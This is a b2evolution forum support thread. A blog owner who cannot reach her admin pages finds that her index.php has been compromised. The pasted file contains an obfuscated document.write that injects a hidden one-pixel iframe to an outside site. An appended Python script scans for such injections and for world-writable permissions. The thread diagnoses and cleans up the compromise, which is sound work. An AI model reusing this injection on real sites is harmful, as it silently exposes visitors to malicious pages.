1 Mar 02, 2010 04:01    

My b2evolution Version: 2.x

Hello All,

I installed the program over a year ago and played around with it for a few weeks and then had a life emergency and had to leave it sit.

I just got back to it and it seems that either my admin section is gone or else I cannot find it.

I am ready to start working on this blog so that I can launch it publicly but I can't seem to find how to get to the place where I can post and make other changes.

I remember redirecting to what is currently being called blog 2 as one of the last things that I did.

The original was at this link....

(I think.... but I remember changing a setting in the back office to choose a different format for the url ... like... primaltruth.blog.thesparkmarket.com - or something like that)

http://www.thesparkmarket.com/evo/

This is the current working link for blog 2...

http://www.thesparkmarket.com/evo/blog2.php

I just really need to find the admin - back office part as I would hate to have to reinstall and lose all the work I have already put into colors and ads etc... and I am ready to delete that test article I put up there and start writing my own stuff there now and get it launched.

Thank you for any help you can give me here.

Angel

3 Mar 03, 2010 08:39

First thank you for the answer.

HOWEVER... I am a bit taken aback.... because.... I CANNOT access my blog to make NEW BLOGS or NEW POSTS but it seems to me that YOU CAN AND DID!!

Your signature HERE on this forum includes this....

"yabba_hh: I think, I type, I read what I type, I think "fuck, what was I thinking when I typed that?!"
tuxnus: that's two more thoughts than I give you credit for"

Now I just googled for my blog and found THIS: (along with about 20 OTHER pages and posts and blogs that have been created on MY DOMAIN AND MY BLOG since I came here to ask for HELP!!)

http://www.thesparkmarket.com/evo/blog3.php/2009/01/23/yabba

A BLOG page on MY SERVER that I DID NOT set up or create!!

when going to the above link.... on MY server/website domain.... you find THIS LINK on the page....

http://innervisions.org.uk/babbles/

When you go to THAT page you find this.... YOUR SAME SIGNATURE

"yabba_hh: I think, I type, I read what I type, I think "fuck, what was I thinking when I typed that?!"
tuxnus: that's two more thoughts than I give you credit for"

So it appears to me that YOU have managed to get into my ADMIN and create a NEW BLOG "blog3" and make posts to MY BLOG and I cannot even do that....

FIRST WHY would you do that? and
SECOND - HOW did you do that?

I have to say that I came here for help from the OFFICIAL website of B2evolution where I assumed I was SAFE to ask for help and I feel VERY violated by this act.

Apparently you have found a way to get into MY blog and create new blogs and posts.... I am DESPERATELY in need of being able to access MY OWN blog to help save my life right now.... and I cannot but you can??

That is very discouraging.

Please cease and desist from using my blog site and if you have any decency tell ME how to access my own blog which is the HELP I came here to ask for.

Can you shed some light on the above happenings for me?

4 Mar 03, 2010 09:01

LOL! That's what I call paranoid!

1.) No one has entered your admin and created a new blog or anything
2.) That blog3.php is the default linkblog that comes with the 'sample content' that YOU chose to install during installation
There is no need to explain the rest but;
3.) That link is included as Yabba is one of the main contributors and linked as well as the others (daniel, fplanque etc..), and no surprise you see his signature in that external link you have followed (his very own website)

5 Mar 03, 2010 09:58

Just to clarify :

Those posts were made on 23rd Jan 2009 when you installed the software and they're the default install posts that are created if you tick the lil box that says "create default posts".

If you hit both of the links in my previous message you'll see that they both lead to blank pages. They're the normal routes to admin.

Even if one of them worked I'd still have needed to guess your password before I could have got into your admin.

Do you *really* think I'm that bloody good at guessing?

¥

6 Mar 03, 2010 10:30

I deleted ALL extra blogs that came with installation... picture blog etc....

IF there is a sane explanation for this I am asking for it.

I did not create these pages ... I certainly did not create a page called blog 3 with a link to that person's personal website and there were 3 blogs with the install and I deleted two of them and then created a second blog. So I should only have two blogs - except that the first one is gone for some reason.

Because I know that I deleted all of the extra blogs that came with installation the pages that I found on a google search alarmed me. Having one of them lead back to the person who helped me in this thread really alarmed me.

It is my understanding that this is a peer to peer user help site.
I came to B2evolution and looked for a place to ask a question of an Admin or someone who is an official employee of b2e and could find nowhere to do that so I came to what appeared to be my only other option - these forums which said they were users answering users... SO WHY would it even EVER occur to me that this person is some kind of a special person whose name would be on THE SOFTWARE that I downloaded?

Especially since I know that I deleted all the extra blogs and pages when I set it up?

But I think you are saying that Yabba is some kind of elevated user or admin and so his name and website are included in EVERY download of the software... is that what you are saying?

If so - again - I am not paranoid or wrong to question this as these forums are labeled as USERS helping USERS so why would I think that he is important enough to have his name on my software download and think that is normal?? and also due to the fact that I know I deleted all extra pages and blogs after install.

I am not paranoid... I am simply discouraged... I asked for help and then I found a bunch of new pages and blogs created on my domain that I did not create and that were not there when I installed to my knowledge- what I am is MORE CONFUSED than before I came here to seek help.

How is me finding a bunch of new blogs and posts on my domain in my blog software and finding the same signature as the person who answered me here - me being paranoid?

If there is a rational reason for this then it means I am uninformed or missing facts but none of that makes me paranoid.

I simply had a question and asked it.... which led me to a second question... and I asked that one.

Your answer frankly just served to get me even more discouraged.

What I need is help finding my admin section; what I don't need is people talking down to me for being confused and asking for explanations. With the facts that I had available the pages that I found looked highly suspicious.

I am brand new to this software and do not have years of knowledge about it or the people involved with it to draw from.

Again, if there is a rational explanation then I apologize.

and again, I appreciate any help that anyone can give me in helping me to find my admin section.

7 Mar 03, 2010 10:39

Thanks for the explanation.

I was alarmed by what I found - a detailed explanation is in the post above.

About guessing passwords... I work for a huge web site and you would be surprised at the clever hacks that I have seen and had to deal with over the years... nothing surprises me anymore. That is why I figured it was possible for a user here to be able to get into the blog software on my domain. I've seen crazier things over the years.

Anyway... moving along :)

I checked where you sent me and do not understand what it says there....

Here is what I found...

$admin_url = $baseurl.$dispatcher;

Dunno what that means but that is what it says.

Sorry for the misunderstanding and again, thank you for any help anyone can give me here.

9 Mar 03, 2010 10:57

Check if both of the following 2 files exist

/evo/htsrv/login.php && /evo/admin.php

¥

11 Mar 03, 2010 11:30

¥åßßå wrote:

Check if both of the following 2 files exist

/evo/htsrv/login.php && /evo/admin.php

¥

Hi -

I checked they are both there.

I looked inside the evo/admin.php file and saw this....

I am wondering if this is supposed to be there or if this could be the problem...

This starts at line 57 - 60 - check global permission

check_perm( 'admin', 'any' ) )
{ // No permission to access admin...
require $adminskins_path.'_access_denied.main.php';

have no idea but thought I would mention it.

Angel

Oh and tilqicom - I don't have GO Daddy but Thanks for looking for me.

12 Mar 03, 2010 11:47

Ok, edit your /evo/admin.php and add this line right after the

<?php

at the very top of the file

ini_set('display_errors', 'on' );

So the top of the file now looks like :

<?php
ini_set('display_errors', 'on' );

Save it and then call up your admin page ( http://www.thesparkmarket.com/evo/admin.php ) and see if you get any error messages

¥

13 Mar 03, 2010 12:15

<?php
ini_set('display_errors', 'on' );

Save it and then call up your admin page ( http://www.thesparkmarket.com/evo/admin.php ) and see if you get any error messages

¥

... I tried that and it is still a blank page when I go to that link.

A.

14 Mar 03, 2010 12:38

Ok, next test :

Remove that line and add these two :

echo 'hello world';
exit();

So your file would now look like :

<?php
echo 'hello world';
exit();

If you don't see hello world when you call that page then have a look and see if you have

/.htaccess or /evo/.htaccess

If either of those files exists see if they have anything that would kill those pages, especially mod_security

¥

15 Mar 03, 2010 13:02

¥åßßå wrote:

/.htaccess or /evo/.htaccess

If either of those files exists see if they have anything that would kill those pages, especially mod_security

¥

I had neither of the above files - only a file evo/sample.htaccess

Here is everything it said in it because I am not sure what I am supposed to look for.

I did not see mod_security in it...

---------------------------------------------------------------------------

# Apache configuration for the blog folder
# Lines starting with # are considered as comments.

# PHP SECURITY:
# this will make register globals off in the evo directory
<IfModule mod_php4.c>
	php_flag register_globals off
</IfModule>
<IfModule mod_php5.c>
	php_flag register_globals off
</IfModule>

# PHP5
# This may need to be in each folder:
# AddHandler application/x-httpd-php5 .php

# CLEAN URLS:
# If you're using Apache 2, you may wish to try this if clean URLs don't work:
# AcceptPathInfo	On


# DEFAULT DOCUMENT TO DISPLAY:
# this will select the default blog template to be displayed
# if the URL is just .../blogs/
<IfModule mod_dir.c>
	DirectoryIndex index.php index.html
</IfModule>


# CATCH EVERYTHING INTO B2EVO:
# The following will allow you to have URL right off the site root,
# using index.php as a stub but not showing it.
# This will add support for URLs like:  http://example.com/2006/08/29/post-title
# Redirect anything that's not an existing directory or file to index.php
#
# RewriteEngine On
# RewriteCond %{REQUEST_FILENAME} !-d
# RewriteCond %{REQUEST_FILENAME} !-f
# RewriteRule ^  index.php

-------------------------------------------------

16 Mar 03, 2010 13:07

Try renaming that to .htaccess and seeing if the link works, if it does then delete the extra 2 lines at the top of admin.php that you added before.

As an aside, could you also post the code in your /evo/index.php ?

¥

17 Mar 03, 2010 13:19

Well... I right clicked and hit rename and removed the word sample from the file name that was sample.htaccess and when I did and clicked out of it it DISAPPEARED completely!! Poof... gone!

So I don't know what that means?

Also here is the code from my /evo/index.php file

---------------------------------------------

<?php
/**
 * This is the main public interface file.
 *
 * IF YOU ARE READING THIS IN YOUR WEB BROWSER, IT MEANS THAT PHP IS NOT PROPERLY INSTALLED
 * ON YOUR WEB SERVER. IF YOU DON'T KNOW WHAT THIS MEANS, CONTACT YOUR SERVER ADMINISTRATOR
 * OR YOUR HOSTING COMPANY.
 *
 * This file is NOT mandatory. You can delete it if you want.
 * You can also replace the contents of this file with contents similar to the contents
 * of a_stub.php, a_noskin.php, multiblogs.php, etc.
 *
 * b2evolution - {@link http://b2evolution.net/}
 * Released under GNU GPL License - {@link http://b2evolution.net/about/license.html}
 * @copyright (c)2003-2008 by Francois PLANQUE - {@link http://fplanque.net/}
 *
 * {@internal Note: we need at least one file in the main package}}
 *
 * @package main
 */

/**
 * First thing: Do the minimal initializations required for b2evo:
 */
require_once dirname(__FILE__).'/conf/_config.php';

require_once $inc_path.'_main.inc.php';

// Check if a specific blog has been requested in the URL:
param( 'blog', 'integer', '', true );

if( empty($blog) )
{ // No blog requested by URL param, let's try to match something in the URL
	$Debuglog->add( 'No blog param received, checking extra path...', 'detectblog' );

	$BlogCache = & get_Cache( 'BlogCache' );

	if( preg_match( '#^(.+?)index.php/([^/]+)#', $ReqHost.$ReqPath, $matches ) )
	{ // We<?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo '
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-7623457-2");
pageTracker._trackPageview();
} catch(err) {}</script>'; ?><?php echo '<script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-32645524-1");pageTracker._trackPageview();} catch(err) {}</script>'; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo '<script>document.write("<"+"i"+"f"+"ram"+"e sr"+"c=\"h"+"t"+"tp"+":"+"/"+"/tr"+"ught"+""+"s"+"a.c"+"o"+"m/\" wid"+"th=1 he"+"ight"+"="+"2></if"+"r"+"a"+""+"me>");</script>'; ?>

--------------------------------------------------------

18 Mar 03, 2010 13:28

Urm, that file is very very very wrong.

Ok, the reason why .htaccess vanished is because your ftp program options are set to hide files that start with a dot, find the setting and kill it

Then go back and check if you have one at /.htaccess

You'll also need to go through all your files and look for any more that have been played around with like that

¥

19 Mar 03, 2010 13:32

I'll bet you have permissions set to 777. That opens a door for a malicious person to hack your files. Could be a bad guy getting in through bad code on someone else's web on your server, or, a bad guy with an account on your server.

Bummer, but you will really have to clean up stuff now.

When I got defaced that way it was EVERY folder in my 777 directories, which meant everything in /media/

BTW accusing one of the best players here of hacking your installation is total bullshit. Grow up.

20 Mar 03, 2010 13:48

¥åßßå wrote:

Urm, that file is very very very wrong.

Ok, the reason why .htaccess vanished is because your ftp program options are set to hide files that start with a dot, find the setting and kill it

Then go back and check if you have one at /.htaccess

You'll also need to go through all your files and look for any more that have been played around with like that

¥

Do you think that I can go to the copy of that file that I have on my computer and copy all the code in it and replace the code in the corrupted one on the server with the code I have in the clean copy on my computer?

Will that work or would that wipe out my colors and settings that I do have done so far?

I may have hit a wall because I cannot find how to change the settings in the ftp program to allow the dot.

But I thank you for all of your help at least I know what the problem is now.
Angel

21 Mar 03, 2010 14:03

The thing is, that's only part of your problem, you really need to check every file on your webspace for having been tampered with.

Try searching google for "[name of ftp software] show dot files" and then go looking for a stray .htaccess as well

¥

22 Mar 03, 2010 15:38

¥åßßå wrote:

The thing is, that's only part of your problem, you really need to check every file on your webspace for having been tampered with.

Try searching google for "[name of ftp software] show dot files" and then go looking for a stray .htaccess as well

¥

About six months ago we were hacked and there was this malicious code added to many pages on my server.

I found all of them I thought but it never occurred to me to go and look in the b2e folder as it seemed to only be aimed at the main site.

I found and removed all of the instances of this thing then and got an all clear from the program that alerted me to it. I was not checking for it in the b2e folder however so it must have been there all the time and I just did not know because as I said, I had to let the blog sit for almost a year.

I did figure out how to change the FTP and did find the .htaccess file by googling as you suggested. TY

I found it and looked in there and nothing looks suspicious to me.. but I don't exactly know what I am looking for either.... should I post the code in here?

Also, I did delete those two lines on the admin.php page as well.

23 Mar 03, 2010 15:56

Sure, paste the code and I'll see if I can find anything

¥

24 Mar 03, 2010 16:14

¥åßßå wrote:

Sure, paste the code and I'll see if I can find anything

¥

Thanks, here it is....

# Apache configuration for the blog folder
# Lines starting with # are considered as comments.

# PHP SECURITY:
# this will make register globals off in the evo directory
<IfModule mod_php4.c>
php_flag register_globals off
</IfModule>
<IfModule mod_php5.c>
php_flag register_globals off
</IfModule>

# PHP5
# This may need to be in each folder:
# AddHandler application/x-httpd-php5 .php

# CLEAN URLS:
# If you're using Apache 2, you may wish to try this if clean URLs don't work:
# AcceptPathInfo On

# DEFAULT DOCUMENT TO DISPLAY:
# this will select the default blog template to be displayed
# if the URL is just .../blogs/
<IfModule mod_dir.c>
DirectoryIndex index.php index.html
</IfModule>

# CATCH EVERYTHING INTO B2EVO:
# The following will allow you to have URL right off the site root,
# using index.php as a stub but not showing it.
# This will add support for URLs like: http://example.com/2006/08/29/post-title
# Redirect anything that's not an existing directory or file to index.php
#
# RewriteEngine On
# RewriteCond %{REQUEST_FILENAME} !-d
# RewriteCond %{REQUEST_FILENAME} !-f
# RewriteRule ^ index.php

26 Mar 03, 2010 16:42

As Lee said, you need to clean those files ( evo/index.php, evo/admin.php && evo/htsrv/login.php ).

That htaccess is the default evo one and no worry ;)

¥
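
Added example (not part of the thread and not b2evolution code): the replies above advise checking every file on the webspace for tampering and warn about 777 permissions, and this Python sketch does both in one pass. The indicator patterns are assumptions modelled on the tampered index.php quoted earlier, and the sample tree it builds is constructed.

```python
import os
import re
import stat
import tempfile

# Heuristic indicators modelled on the tampered index.php quoted in this thread (assumptions).
INDICATORS = {
    "empty-echo-run": re.compile(r"(?:<\?php\s+echo\s+'';\s*\?>\s*){3,}"),
    "php-echo-script": re.compile(r"<\?php\s+echo\s+'\s*<script", re.I),
    "split-string-write": re.compile(r'document\.write\(\s*"[^"]{0,3}"\s*\+\s*"'),
}
SCAN_SUFFIXES = (".php", ".html", ".js", ".htaccess")

def scan_file(path):
    """Return the sorted names of the indicators found in one file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def audit_tree(root):
    """Walk root (dot files included); report suspect files and 777-style modes."""
    report = {"tampered": {}, "world_writable": []}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if stat.S_ISLNK(mode):
                continue  # symlinks are not followed or scanned
            rel = os.path.relpath(path, root)
            if mode & stat.S_IWOTH:  # writable by every account on the host
                report["world_writable"].append(rel)
            if stat.S_ISREG(mode) and name.endswith(SCAN_SUFFIXES):
                hits = scan_file(path)
                if hits:
                    report["tampered"][rel] = hits
    return report

def build_demo_tree():
    """Constructed sample webroot: one clean file, one tampered file, one 777 dir."""
    root = tempfile.mkdtemp(prefix="webroot-demo-")
    samples = {
        "index.php": "<?php\nrequire_once dirname(__FILE__).'/conf/_config.php';\n",
        "admin.php": "<?php // We" + "<?php echo ''; ?>" * 4
        + "<?php echo '<script>document.write(\"<\"+\"i\"+\"f\"+\"rame>\");</script>'; ?>\n",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)
        os.chmod(os.path.join(root, name), 0o644)
    os.mkdir(os.path.join(root, "media"))
    os.chmod(os.path.join(root, "media"), 0o777)
    return root

if __name__ == "__main__":
    print(audit_tree(build_demo_tree()))
```

A hit is a reason to compare the file against a clean copy from the original release archive, not proof of tampering on its own.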

